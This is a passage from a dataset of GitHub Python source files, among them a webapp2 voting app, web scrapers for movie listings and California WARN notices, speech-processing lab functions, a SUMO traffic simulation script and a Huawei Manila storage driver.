successfully', key='message')\n else:\n self.session.add_flash('alert alert-error', key='status')\n self.session.add_flash('Cannot post. Are you authorized?', key='message')\n \n self.redirect(self.uri_for('index'))\n \nclass VoteHandler(BaseHandler):\n def post(self):\n p = post1.Post()\n key = self.request.get('value')\n votes = 0\n \n if(self.request.get('action') == 'upvote'):\n p = p.upvote(key)\n votes = p.upvotes\n elif(self.request.get('action') == 'downvote'):\n p = p.downvote(key)\n votes = p.downvotes\n \n self.response.write(json.dumps({ 'count' : votes, 'score' : p.score }))\n \nclass LoginHandler(BaseHandler):\n def post(self):\n if(self.request.get('Login') == 'a correct password'):\n self.session['authorized'] = 'True'\n self.session.add_flash('alert alert-success', key='status')\n self.session.add_flash('Authorized to post messages', key='message')\n else:\n self.session.add_flash('alert alert-error', key='status')\n self.session.add_flash('Incorrect authentication', key='message')\n \n self.redirect('/')\n\nclass DeleteHandler(BaseHandler):\n def post(self):\n logging.debug(self.session.get('authorized'))\n if(self.session.get('authorized') == 'True'):\n key = self.request.get('key')\n post1.Post().delete(key)\n self.response.write(json.dumps({}))\n else:\n self.abort(403)\n \n # if(self.request.get('Login') == 'a correct password'):\n # self.session['authorized'] = 'True'\n # self.session.add_flash('alert alert-success', key='status')\n # self.session.add_flash('Authorized to post messages', key='message')\n # else:\n # self.session.add_flash('alert alert-error', key='status')\n # self.session.add_flash('Incorrect authentication', key='message')\n \n \napp = webapp2.WSGIApplication([\n webapp2.Route('/', MainHandler, name='index'),\n ('/post', PostHandler),\n ('/vote', VoteHandler),\n ('/login', LoginHandler),\n ('/delete', DeleteHandler)\n], debug=True, config=config.config)\n","repo_name":"posibyte/wilsonrankgaetest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41677096247","text":"#!/usr/bin/env python\n\n\"\"\"Aggiorna la vista materializzata\"\"\"\n\n__author__ = \"Roberto Marzocchi\"\n__copyright__ = \"Gter srl\"\n\n\nimport os # standard library\nimport sys\n\nimport requests # 3rd party packages\nimport json\n\nimport psycopg2\nfrom credenziali import *\nconn = psycopg2.connect(\"dbname={} user={} password={} host={}\".format(db, user, pwd, ip))\ncur=conn.cursor()\n\n\n\n# recupero il percorso allo script python \nspath=os.path.dirname(os.path.realpath(__file__)) \n# la sottocartella log deve esserci e possibilmente inseritanel file .gitignore \n\n# libreria per gestione log\nimport logging\n# inserire riferimento a data e schema \n\n\nlogging.basicConfig( \n format='%(asctime)s\\t%(levelname)s\\t%(message)s',\n filemode='w', # overwrite or append \n filename='{}/log/refresh_mv.log'.format(spath), # nome file (commentandolo viene stampato a schermo\n level=logging.DEBUG\n )\n\n\n\nquery1=u'refresh materialized view terra.mv_statistiche_totali_telecamere_100;'\ntry:\n cur.execute(query1)\n conn.commit()\nexcept Exception as e1:\n logging.error(e)\n conn.rollback()\n \n\n\ncur.close()\nconn.close()\n \n\n\nlogging.info('Ho finito. refresh materialized view terra.mv_statistiche_totali_telecamere_100')\n","repo_name":"gtergeomatica/loseplus","sub_path":"update_refresh_view.py","file_name":"update_refresh_view.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38570283524","text":"import os\r\nimport sys\r\nimport subprocess\r\n\r\nconfig_file_path = ''\r\n\r\ndef sumo_init():\r\n if 'SUMO_HOME' in os.environ:\r\n tools =os.path.join(os.environ['SUMO_HOME'], 'tools')\r\n print(\"设置的SUMO路径为\" + tools)\r\n sys.path.append(tools)\r\n print('sumo path set done')\r\n else: \r\n sys.exit(\"please declare environmentvariable 'SUMO_HOME'\")\r\n # sumoProcess = subprocess.Popen([sumoBinary, \"-c\", \"./test.sumocfg\", \"--remote-port\", str(PORT)], stdout=sys.stdout, stderr=sys.stderr)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n args = sys.argv[1:]\r\n if len(args) != 1:\r\n print('Usage: python ' + sys.argv[0] + ' cfg_file')\r\n exit(-1)\r\n config_file_path = args[0]\r\n print(\"path: \" + config_file_path)\r\n sumo_init()\r\n \r\n import traci\r\n import traci.constants as tc\r\n print(\"traci import done\")\r\n PORT = 8813\r\n sumoBinary = 'sumo'\r\n sumoCmd = [sumoBinary, \"-c\", config_file_path]\r\n vehID = \"0\"\r\n traci.start(sumoCmd)\r\n traci.vehicle.subscribe(vehID, (tc.VAR_ROAD_ID, tc.VAR_LANEPOSITION))\r\n print(traci.vehicle.getSubscriptionResults(vehID))\r\n for step in range(3):\r\n print(\"step\", step)\r\n traci.simulationStep()\r\n print(traci.vehicle.getSubscriptionResults(vehID))\r\n traci.close()\r\n # traci.vehicle.subscribe(\"0\", (tc.VAR_SPEED, tc.VAR_ACCEL, tc.VAR_ROAD_ID, tc.VAR_LANE_ID, tc.VAR_POSITION))\r\n # 一直执���仿真直到所有车辆到达目的地\r\n # traci.vehicle.moveToXY(vehID=\"0\", edgeID=\"1[1][0]\", lane=1, x=563.869048, y=456, keepRoute=0)\r\n i = 0\r\n # while traci.simulation.getMinExpectedNumber() > 0:\r\n # traci.simulationStep()\r\n # if i < 100:\r\n # for veh_id in traci.vehicle.getIDList():\r\n # speed = traci.vehicle.getSpeed(veh_id)\r\n # [x, y] = traci.vehicle.getPosition(veh_id)\r\n # print(veh_id, ':', speed, \":[\", x, \",\", y, \"]\")\r\n\r\n # i += 1\r\n \r\n # step = 0\r\n # while step < 1000:\r\n # traci.simulationStep()\r\n # # print(traci.vehicle.getSubscriptionResults(vehID))\r\n # step += 1\r\n # traci.close()\r\n\r\n\r\n# traci.start([\"sumo\", \"-c\", \"my.sumocfg\"]) \r\n# traci.vehicle.subscribe(vehID, (tc.VAR_ROAD_ID, tc.VAR_LANEPOSITION))\r\n# print(traci.vehicle.getSubscriptionResults(vehID))\r\n# for step in range(3):\r\n# print(\"step\", step)\r\n# traci.simulationStep()\r\n# print(traci.vehicle.getSubscriptionResults(vehID))\r\n# traci.close()","repo_name":"Zealoft/Carla_SUMO","sub_path":"SUMOServer/sumo_simulation.py","file_name":"sumo_simulation.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"22552990471","text":"import networkx as nx\nimport math\nimport random\n\nf=open('test_case_6','r')\nm_prob=float(f.readline())\nk_count=int(f.readline())\n\nnumber_of_nodes=int(f.readline())\n\nnumber_of_edges=int(f.readline())\n\ng=nx.Graph()\n\nfor i in range(number_of_edges):\n\tl=f.readline().split()\n\tg.add_edge(int(l[0]),int(l[1]))\n\tg[int(l[0])][int(l[1])]['weight']=-math.log10(1-float(l[2]))\n\tg[int(l[0])][int(l[1])]['color']=int(l[3])\n\ns=nx.algorithms.simple_paths.all_simple_paths(g,source=1,target=number_of_nodes)\n\ndef path_prob(g,path,target):\n prob=0.0\n k=0\n for index,i in enumerate(path):\n if(i==target):\n break\n prob=prob + g[i][path[index+1]]['weight']\n k=k+g[i][path[index+1]]['color']\n return (prob,k)\n\nflag=0\nfor path in s:\n pp,pk=path_prob(g,path,number_of_nodes)\n if pp<=m_prob and pk <= k_count:\n flag=1\n break\n\n\nprint(m_prob)\nprint(k_count)\nprint(flag)\n\n","repo_name":"parasgoyal12/CS201_DataStructure","sub_path":"Assignment5/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40080374206","text":"from flask import Flask, render_template\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup, re\r\n\r\n\r\napp = Flask(__name__)\r\n\r\nMOVEEK_URL = \"https://moveek.com/en/\"\r\nHBO_URL = \"https://www.hbo.com/series\"\r\n\r\ndef get_URL(URL):\r\n \"\"\"Get HTML from(URL)\r\n \"\"\"\r\n r = requests.get(URL)\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n return soup\r\n\r\n\r\ndef crawl_moveek(URL):\r\n soup = get_URL(URL)\r\n movies = soup.find_all(href=re.compile(\"/phim/\"))\r\n movies_list = list()\r\n\r\n for movie in movies:\r\n _movie = {}\r\n if movie.img:\r\n _movie[\"title\"] = movie[\"title\"]\r\n _movie[\"link\"] = movie[\"href\"]\r\n _movie[\"img\"] = movie.img[\"data-src\"]\r\n movies_list.append(_movie)\r\n return movies_list\r\n\r\n\r\ndef crawl_rating_moveek(URL):\r\n movies_list = crawl_moveek(URL)\r\n for i in range(len(movies_list)):\r\n movie = movies_list[i]\r\n soup = get_URL(\"https://moveek.com\"+movie[\"link\"])\r\n movie[\"gerne\"] = soup.find(class_ = \"mb-0 text-muted text-truncate\").string.strip().strip(\"-\").strip()\r\n try:\r\n movie[\"description\"] = soup.find(class_ = \"mb-3 text-justify\").text\r\n except:\r\n if \"description\" not in movie:\r\n soup=get_URL(\"https://moveek.com/\"+movie[\"link\"].strip(\"/en\"))\r\n movie[\"description\"] = soup.find(class_ = \"mb-3 text-justify\").text\r\n movie[\"rating\"] = soup.find(href = re.compile(\"/review/\")).text.strip()\r\n if movie[\"rating\"] == \"Reviews\" or movie[\"rating\"] == \"Đánh giá\":\r\n movie[\"rating\"] = \"No Review\"\r\n return movies_list\r\n\r\ndef crawl_hbo(URL):\r\n soup = get_URL(URL)\r\n movie_list = []\r\n movies = soup.find_all(class_=\"components/Card--card components/Card--promotional components/Card--withBottomBorder\")\r\n for movie in movies:\r\n _movie = {}\r\n _movie[\"title\"] = movie.find(class_=\"components/CardText--title\").string\r\n _movie[\"link\"] = \"https://www.hbo.com\"+movie[\"href\"]\r\n _movie[\"img\"] = \"https://www.hbo.com\" + movie.find(class_=\"components/CardImage--imageContainer\").img[\"src\"]\r\n try:\r\n _movie[\"description\"] = movie.find(class_=\"components/CardText--details\").p.string\r\n _movie[\"show_time\"] = movie.find(class_=\"components/CardText--contextualLabel\").string\r\n except:\r\n pass\r\n movie_list.append(_movie)\r\n return movie_list\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route('/movies')\r\ndef movies():\r\n data=crawl_rating_moveek(MOVEEK_URL)\r\n return render_template('movies.html', data=data)\r\n\r\n@app.route('/series')\r\ndef series():\r\n data=crawl_hbo(HBO_URL)\r\n return render_template('series.html', data=data)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=5000, debug=True)\r\n","repo_name":"huynhdao0808/hbo-web-crawler_fa","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19046984446","text":"# DT2118, Lab 1 Feature Extraction\n# Functions to be implemented ----------------------------------\n\nimport scipy.signal as sig\nimport scipy.fftpack as ft\nimport tools\nimport numpy as np \n\ndef enframe(samples, winlen, winshift):\n \"\"\"\n Slices the input samples into overlapping windows.\n\n Args:\n winlen: window length in samples.\n winshift: shift of consecutive windows in samples\n Returns:\n numpy array [N x winlen], where N is the number of windows that fit\n in the input signal\n \"\"\"\n\n prev = 0\n nxt = int(winlen) # 400 samples in one frame (20 ms)\n\n step = int(winshift) # 200 samples per step (10 ms)\n\n num_frames = int(((samples.size - winshift) // winlen) * 2) # 80 frames fit in the signal\n\n result = np.zeros(shape=(num_frames,winlen))\n\n for i in range(0,num_frames):\n result[i] = samples[prev:nxt]\n prev += step\n nxt += step\n\n return result\n\ndef preemp(inp, p=0.97):\n \"\"\"\n Pre-emphasis filter.\n\n Args:\n input: array of speech frames [N x M] where N is the number of frames and\n M the samples per frame\n p: preemhasis factor (defaults to the value specified in the exercise)\n\n Output:\n output: array of pre-emphasised speech samples\n Note (you can use the function lfilter from scipy.signal)\n \"\"\"\n\n np.set_printoptions(suppress=True)\n\n b = np.array([1,-p])\n a = np.array([1])\n\n filtered_signal = sig.lfilter(b, a, inp)\n\n return filtered_signal\n\n\ndef windowing(inp):\n \"\"\"\n Applies hamming window to the input frames.\n\n Args:\n input: array of speech samples [N x M] where N is the number of frames and\n M the samples per frame\n Output:\n array of windowed speech samples [N x M]\n Note (you can use the function hamming from scipy.signal, include the sym=0 option\n if you want to get the same results as in the example)\n \"\"\"\n\n M = 400\n\n winfunc = sig.hamming(M, sym = False)\n\n win = inp * winfunc\n\n return win\n\ndef powerSpectrum(inp, nfft):\n \"\"\"\n Calculates the power spectrum of the input signal, that is the square of the modulus of the FFT\n\n Args:\n input: array of speech samples [N x M] where N is the number of frames and\n M the samples per frame\n nfft: length of the FFT\n Output:\n array of power spectra [N x nfft]\n Note: you can use the function fft from scipy.fftpack\n \"\"\"\n\n spec = ft.fft(inp, nfft)\n\n spec = abs(spec)**2\n\n return spec\n\ndef logMelSpectrum(inp, samplingrate):\n \"\"\"\n Calculates the log output of a Mel filterbank when the input is the power spectrum\n\n Args:\n input: array of power spectrum coefficients [N x nfft] where N is the number of frames and\n nfft the length of each spectrum\n samplingrate: sampling rate of the original signal (used to calculate the filterbanks)\n Output:\n array of Mel filterbank log outputs [N x nmelfilters] where nmelfilters is the number\n of filters in the filterbank\n Note: use the trfbank function provided in tools.py to calculate the filterbank shapes and\n nmelfilters\n \"\"\"\n\n\n\n trf = tools.trfbank(samplingrate, 512)\n\n res = np.dot(inp, trf.T)\n\n res = np.log10(res)\n\n return res\n\ndef cepstrum(inp, nceps):\n \"\"\"\n Calulates Cepstral coefficients from mel spectrum applying Discrete Cosine Transform\n\n Args:\n input: array of log outputs of Mel scale filterbank [N x nmelfilters] where N is the\n number of frames and nmelfilters the length of the filterbank\n nceps: number of output cepstral coefficients\n Output:\n array of Cepstral coefficients [N x nceps]\n Note: you can use the function dct from scipy.fftpack.realtransforms\n \"\"\"\n\n cosine = ft.dct(inp, norm = 'ortho')\n\n res = cosine[:,0:nceps]\n\n# res = tools.lifter(res)\n\n return res\n\ndef dtw(localdist):\n \"\"\"Dynamic Time Warping.\n\n Args:\n localdist: array NxM of local distances computed between two sequences\n of length N and M respectively\n\n Output:\n globaldist: scalar, global distance computed by Dynamic Time Warping\n \"\"\"\n\n test = float(\"inf\")\n\n LocD_rows, LocD_columns = localdist.shape\n\n AccD = np.ones(shape = (LocD_rows + 1, LocD_columns + 1))\n\n for i in range(1, LocD_rows + 1):\n AccD[i][0] = test\n for i in range(1, LocD_columns + 1):\n AccD[0][i] = test\n AccD[0][0] = 0\n\n\n for h in range(1, LocD_rows + 1):\n for k in range(1, LocD_columns + 1):\n AccD[h][k] = localdist[h-1][k-1] + min(AccD[h-1][k], AccD[h-1][k-1], AccD[h][k-1])\n\n res = AccD[1:LocD_rows + 1][1:LocD_columns + 1]\n\n return res\n\n","repo_name":"RikkoE/Speech-recognition-lab-1","sub_path":"proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29664277103","text":"import logging\nimport os\nimport re\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nimport pdfplumber\nfrom bs4 import BeautifulSoup\nfrom openpyxl import load_workbook\n\nfrom .. import utils\nfrom ..cache import Cache\n\n__authors__ = [\"zstumgoren\", \"Dilcia19\", \"ydoc5212\", \"stucka\"]\n__tags__ = [\"html\", \"pdf\", \"excel\"]\n__source__ = {\n \"name\": \"California Employment Development Department\",\n \"url\": \"https://edd.ca.gov/en/Jobs_and_Training/Layoff_Services_WARN\",\n}\n\nlogger = logging.getLogger(__name__)\n\n\ndef scrape(\n data_dir: Path = utils.WARN_DATA_DIR,\n cache_dir: Path = utils.WARN_CACHE_DIR,\n) -> Path:\n \"\"\"\n Scrape data from California.\n\n Compiles a single CSV for CA using historical PDFs and an Excel file for the current fiscal year.\n\n Only regenerates the CSV if a PDF or the Excel file have changed.\n\n Keyword arguments:\n data_dir -- the Path were the result will be saved (default WARN_DATA_DIR)\n cache_dir -- the Path where results can be cached (default WARN_CACHE_DIR)\n\n Returns: the Path where the file is written\n \"\"\"\n cache = Cache(cache_dir)\n base_url = \"https://edd.ca.gov/Jobs_and_Training\"\n\n # Get the page with the link list\n logger.debug(\"Scraping list of data files\")\n list_url = f\"{base_url}/Layoff_Services_WARN.htm\"\n list_page = utils.get_url(list_url)\n list_html = list_page.text\n cache.write(\"ca/list.html\", list_html)\n\n # Parse out all the links\n list_soup = BeautifulSoup(list_html, \"html.parser\")\n link_list = []\n for link in list_soup.find_all(\"a\"):\n # Grab the URL\n href_url = link.attrs.get(\"href\", \"\").strip()\n\n # If it's a WARN link ...\n if re.search(r\"warn[-_]?report\", href_url, re.I):\n # Build it up\n if href_url.startswith(\"/\"):\n full_url = f\"https://edd.ca.gov{href_url}\"\n else:\n full_url = href_url\n\n # Add it to the list\n link_list.append(full_url)\n\n # Download all the data files\n file_list = []\n for link in link_list:\n file_name = os.path.basename(urlparse(link).path)\n file_path = cache.download(f\"ca/{file_name}\", link)\n file_list.append(file_path)\n\n # Parse all the data files\n output_rows = []\n for file_ in file_list:\n if str(file_).endswith(\"pdf\"):\n row_list = _extract_pdf_data(file_)\n else:\n row_list = _extract_excel_data(file_)\n output_rows += row_list\n\n # Write it out\n output_headers = [\n \"notice_date\",\n \"effective_date\",\n \"received_date\",\n \"company\",\n \"city\",\n \"num_employees\",\n \"layoff_or_closure\",\n \"county\",\n \"address\",\n \"source_file\",\n ]\n output_path = data_dir / \"ca.csv\"\n utils.write_dict_rows_to_csv(\n output_path, output_headers, output_rows, extrasaction=\"ignore\"\n )\n\n # Return the path\n return output_path\n\n\ndef _extract_excel_data(wb_path):\n \"\"\"Parse data from the provided Excel file.\"\"\"\n logger.debug(f\"Reading in {wb_path}\")\n wb = load_workbook(filename=wb_path)\n targetsheet = \"Detailed WARN Report \"\n if targetsheet in wb.sheetnames:\n ws = wb[targetsheet]\n logger.debug(f\"Using worksheet '{targetsheet}'\")\n else:\n ws = wb.worksheets[0]\n logger.debug(\n f\"Using first worksheet; sheet {targetsheet} not found, but maybe look for them to remove the space\"\n )\n rows = [row for row in ws.rows]\n # Throw away initial rows until we reach first data row\n while True:\n row = rows.pop(0)\n first_cell = row[0].value.strip().lower()\n if first_cell.startswith(\"county\"):\n # Grab the header\n headers = row\n break\n\n # Get the location of the final two fields, which vary from week to week\n num_employees_index = next(\n i for i, c in enumerate(headers) if c.value and \"employees\" in c.value.lower()\n )\n address_index = next(\n i for i, c in enumerate(headers) if c.value and \"address\" in c.value.lower()\n )\n\n # Loop through all the rows\n payload = []\n for row in rows:\n first_cell = row[0].value.strip().lower()\n # Exit if we've reached summary row at bottom\n if first_cell == \"report summary\":\n break\n\n data = {\n \"county\": row[0].value.strip(),\n \"notice_date\": _convert_date(row[1].value),\n \"received_date\": _convert_date(row[2].value),\n \"effective_date\": _convert_date(row[3].value),\n \"company\": row[4].value.strip(),\n \"layoff_or_closure\": row[5].value.strip(),\n \"num_employees\": row[num_employees_index].value,\n \"address\": row[address_index].value.strip(),\n \"source_file\": str(wb_path).split(\"/\")[-1],\n }\n payload.append(data)\n return payload\n\n\ndef _convert_date(dt):\n return dt.strftime(\"%m/%d/%Y\")\n\n\ndef _extract_pdf_data(pdf_path):\n headers = [\n \"notice_date\",\n \"effective_date\",\n \"received_date\",\n \"company\",\n \"location\",\n \"city\",\n \"county\",\n \"num_employees\",\n \"layoff_or_closure\",\n \"source_file\",\n ]\n header_crosswalk = {\n \"Address\": \"location\",\n \"City\": \"city\",\n \"Company\": \"company\",\n \"County\": \"county\",\n \"Effective\\nDate\": \"effective_date\",\n \"Effective \\nDate\": \"effective_date\",\n \"Effective \\nDate\": \"effective_date\",\n \"Effective Date\": \"effective_date\",\n \"EffectiveDate\": \"effective_date\",\n \"Employees\": \"num_employees\",\n \"Layoff/Closure\": \"layoff_or_closure\",\n \"Layoff/Closure Type\": \"layoff_or_closure\",\n \"Layoff/Closure\\nType\": \"layoff_or_closure\",\n \"Layoff/Closure \\nType\": \"layoff_or_closure\",\n \"No. Of \\nEmployees\": \"num_employees\",\n \"No. Of Employees\": \"num_employees\",\n \"No. Of\\nEmployees\": \"num_employees\",\n \"Notice\\nDate\": \"notice_date\",\n \"Notice Date\": \"notice_date\",\n \"NoticeDate\": \"notice_date\",\n \"Received\\nDate\": \"received_date\",\n \"Received \\nDate\": \"received_date\",\n \"Received Date\": \"received_date\",\n \"ReceivedDate\": \"received_date\",\n }\n data = []\n logger.debug(f\"Opening {pdf_path} for PDF parsing\")\n with pdfplumber.open(pdf_path) as pdf:\n for idx, page in enumerate(pdf.pages):\n # All pages pages except last should have a single table\n # Last page has an extra summary table, but indexing\n # for the first should avoid grabbing the summary data\n rows = page.extract_tables()[0]\n # Remove header row on first page\n # and update the standardized \"headers\" var if the source\n # data has no county field, as in the case of\n # files covering 07/2016-to-06/2017 fiscal year and earlier\n if idx == 0:\n raw_header = rows.pop(0)\n raw_header_str = \"-\".join([col.strip().lower() for col in raw_header])\n if \"county\" not in raw_header_str:\n headers.remove(\"county\")\n # Skip if it's a summary table (this happens\n # when summary is only table on page, as in 7/2019-6/2020)\n first_cell = rows[0][0].strip().lower()\n if \"summary\" in first_cell:\n continue\n for row in rows:\n data_row = {}\n for i, value in enumerate(row):\n this_raw_header = raw_header[i]\n this_clean_header = header_crosswalk[this_raw_header]\n data_row[this_clean_header] = value\n # Data clean-ups\n data_row.update(\n {\n \"effective_date\": data_row[\"effective_date\"].replace(\" \", \"\"),\n \"received_date\": data_row[\"received_date\"].replace(\" \", \"\"),\n \"source_file\": str(pdf_path).split(\"/\")[-1],\n }\n )\n data.append(data_row)\n return data\n\n\nif __name__ == \"__main__\":\n scrape()\n","repo_name":"biglocalnews/warn-scraper","sub_path":"warn/scrapers/ca.py","file_name":"ca.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"24676880069","text":"import time\n\nfrom oslo_config import cfg\nfrom oslo_log import log\nfrom oslo_utils import excutils\nfrom oslo_utils import units\n\nfrom manila import exception\nfrom manila.i18n import _\nfrom manila.i18n import _LI\nfrom manila.i18n import _LW\nfrom manila.openstack.common import loopingcall\nfrom manila.share import driver\nfrom manila.share.drivers.huawei import constants\nfrom manila.share.drivers.huawei import huawei_helper\n\nhuawei_opts = [\n cfg.StrOpt('manila_huawei_conf_file',\n default='/etc/manila/manila_huawei_conf.xml',\n help='The configuration file for the Manila Huawei driver.')]\n\nCONF = cfg.CONF\nCONF.register_opts(huawei_opts)\nLOG = log.getLogger(__name__)\n\n\nclass HuaweiNasDriver(driver.ShareDriver):\n \"\"\"Huawei Share Driver.\n\n Executes commands relating to Shares.\n API version history:\n\n 1.0 - Initial version.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Do initialization.\"\"\"\n LOG.debug(\"Enter into init function.\")\n super(HuaweiNasDriver, self).__init__(False, *args, **kwargs)\n self.configuration = kwargs.get('configuration', None)\n if self.configuration:\n self.configuration.append_config_values(huawei_opts)\n self.helper = huawei_helper.RestHelper(self.configuration)\n else:\n raise exception.InvalidShare(_(\"Huawei configuration missing.\"))\n\n def check_for_setup_error(self):\n \"\"\"Returns an error if prerequisites aren't met.\"\"\"\n self.helper._check_conf_file()\n self.helper._check_service()\n\n def do_setup(self, context):\n \"\"\"Any initialization the huawei nas driver does while starting.\"\"\"\n LOG.debug(\"Do setup the plugin.\")\n return self.helper.login()\n\n def create_share(self, context, share, share_server=None):\n \"\"\"Create a share.\"\"\"\n LOG.debug(\"Create a share.\")\n share_name = share['name']\n share_proto = share['share_proto']\n size = share['size'] * units.Mi * 2\n\n fs_id = None\n # We sleep here to ensure the newly created filesystem can be read.\n wait_interval = self._get_wait_interval()\n try:\n fs_id = self.helper.allocate_container(share_name, size)\n\n def _create_share_complete():\n fs = self.helper._get_fs_info_by_id(fs_id)\n if fs['HEALTHSTATUS'] == constants.STATUS_FS_HEALTH\\\n and fs['RUNNINGSTATUS'] == constants.STATUS_FS_RUNNING:\n return True\n else:\n return False\n self._wait_for_condition(_create_share_complete,\n int(wait_interval))\n except Exception:\n with excutils.save_and_reraise_exception():\n if fs_id is not None:\n self.helper._delete_fs(fs_id)\n raise exception.InvalidShare('The status of filesystem error.')\n\n try:\n self.helper._create_share(share_name, fs_id, share_proto)\n except Exception:\n with excutils.save_and_reraise_exception():\n if fs_id is not None:\n self.helper._delete_fs(fs_id)\n\n location = self.helper._get_location_path(share_name, share_proto)\n return location\n\n def create_share_from_snapshot(self, context, share, snapshot,\n share_server=None):\n \"\"\"Is called to create share from snapshot.\"\"\"\n LOG.debug(\"Create share from snapshot.\")\n raise NotImplementedError()\n\n def delete_share(self, context, share, share_server=None):\n \"\"\"Delete a share.\"\"\"\n LOG.debug(\"Delete a share.\")\n\n self.helper._delete_share(share['name'], share['share_proto'])\n\n def create_snapshot(self, context, snapshot, share_server=None):\n \"\"\"Create a snapshot.\"\"\"\n snap_name = snapshot['id']\n share_proto = snapshot['share_proto']\n\n share_name = self.helper._get_share_name_by_id(snapshot['share_id'])\n share_type = self.helper._get_share_type(share_proto)\n share = self.helper._get_share_by_name(share_name, share_type)\n\n if not share:\n err_msg = (_(\"Create a snapshot,share fs id is empty.\"))\n LOG.error(err_msg)\n raise exception.InvalidInput(reason=err_msg)\n\n sharefsid = share['FSID']\n snapshot_name = \"share_snapshot_\" + snap_name\n snap_id = self.helper._create_snapshot(sharefsid,\n snapshot_name)\n LOG.info(_LI('Creating snapshot id %s.'), snap_id)\n\n def delete_snapshot(self, context, snapshot, share_server=None):\n \"\"\"Delete a snapshot.\"\"\"\n LOG.debug(\"Delete a snapshot.\")\n snap_name = snapshot['id']\n\n share_name = self.helper._get_share_name_by_id(snapshot['share_id'])\n sharefsid = self.helper._get_fsid_by_name(share_name)\n\n if sharefsid is None:\n LOG.warn(_LW('Delete snapshot share id %s fs has been deleted.'),\n snap_name)\n return\n\n snapshot_id = self.helper._get_snapshot_id(sharefsid, snap_name)\n snapshot_flag = self.helper._check_snapshot_id_exist(snapshot_id)\n\n if snapshot_flag is True:\n self.helper._delete_snapshot(snapshot_id)\n else:\n LOG.warn(_LW(\"Can not find snapshot %s in array.\"), snap_name)\n\n def ensure_share(self, context, share, share_server=None):\n \"\"\"Ensure that storages are mounted and exported.\"\"\"\n LOG.debug(\"Ensure share.\")\n\n def allow_access(self, context, share, access, share_server=None):\n \"\"\"Allow access to the share.\"\"\"\n LOG.debug(\"Allow access.\")\n\n self.helper._allow_access(share['name'], access, share['share_proto'])\n\n def deny_access(self, context, share, access, share_server=None):\n \"\"\"Deny access to the share.\"\"\"\n LOG.debug(\"Deny access.\")\n\n self.helper._deny_access(share['name'], access, share['share_proto'])\n\n def get_network_allocations_number(self):\n \"\"\"Get number of network interfaces to be created.\"\"\"\n LOG.debug(\"Get network allocations number.\")\n return constants.IP_ALLOCATIONS\n\n def _update_share_stats(self):\n \"\"\"Retrieve status info from share group.\"\"\"\n\n backend_name = self.configuration.safe_get('share_backend_name')\n capacity = self.helper._get_capacity()\n data = dict(\n share_backend_name=backend_name or 'HUAWEI_NAS_Driver',\n vendor_name='Huawei',\n storage_protocol='NFS_CIFS',\n total_capacity_gb=capacity['total_capacity'],\n free_capacity_gb=capacity['free_capacity'])\n super(HuaweiNasDriver, self)._update_share_stats(data)\n\n def _get_wait_interval(self):\n \"\"\"Get wait interval from huawei conf file.\"\"\"\n root = self.helper._read_xml()\n wait_interval = root.findtext('Filesystem/WaitInterval')\n if wait_interval:\n return wait_interval\n else:\n LOG.info(_LI(\n \"Wait interval is not configured in huawei \"\n \"conf file. Use default: %(default_wait_interval)d.\"),\n {\"default_wait_interval\": constants.DEFAULT_WAIT_INTERVAL})\n return constants.DEFAULT_WAIT_INTERVAL\n\n def _get_timeout(self):\n \"\"\"Get timeout from huawei conf file.\"\"\"\n root = self.helper._read_xml()\n timeout = root.findtext('Filesystem/Timeout')\n if timeout:\n return timeout\n else:\n LOG.info(_LI(\n \"Timeout is not configured in huawei conf file. \"\n \"Use default: %(default_timeout)d.\"),\n {\"default_timeout\": constants.DEFAULT_TIMEOUT})\n return constants.DEFAULT_TIMEOUT\n\n def _wait_for_condition(self, func, interval, timeout=None):\n start_time = time.time()\n if timeout is None:\n timeout = self._get_timeout()\n\n def _inner():\n try:\n res = func()\n except Exception as ex:\n res = False\n LOG.debug('_wait_for_condition: %(func_name)s '\n 'failed for %(exception)s.',\n {'func_name': func.__name__,\n 'exception': ex.message})\n if res:\n raise loopingcall.LoopingCallDone()\n\n if int(time.time()) - int(start_time) > int(timeout):\n msg = (_('_wait_for_condition: %s timed out.')\n % func.__name__)\n LOG.error(msg)\n raise exception.InvalidShare(data=msg)\n\n timer = loopingcall.FixedIntervalLoopingCall(_inner)\n timer.start(interval=interval).wait()\n","repo_name":"Huawei/OpenStack_Driver","sub_path":"Manila/Kilo-eol/huawei_nas.py","file_name":"huawei_nas.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"35277995056","text":"from django.contrib import admin\nfrom django.urls import path, re_path, include\n\nfrom rest_framework import permissions\n\nfrom apps.users.views import Login, Logout\n\n# noinspection PyUnresolvedReferences\nfrom drf_yasg.views import get_schema_view\n# noinspection PyUnresolvedReferences\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Documentación API MiQuiniela\",\n default_version='v0.1',\n description=\"Documentación pública de API quiniela\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"alvarogarnica1997@gmail.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n 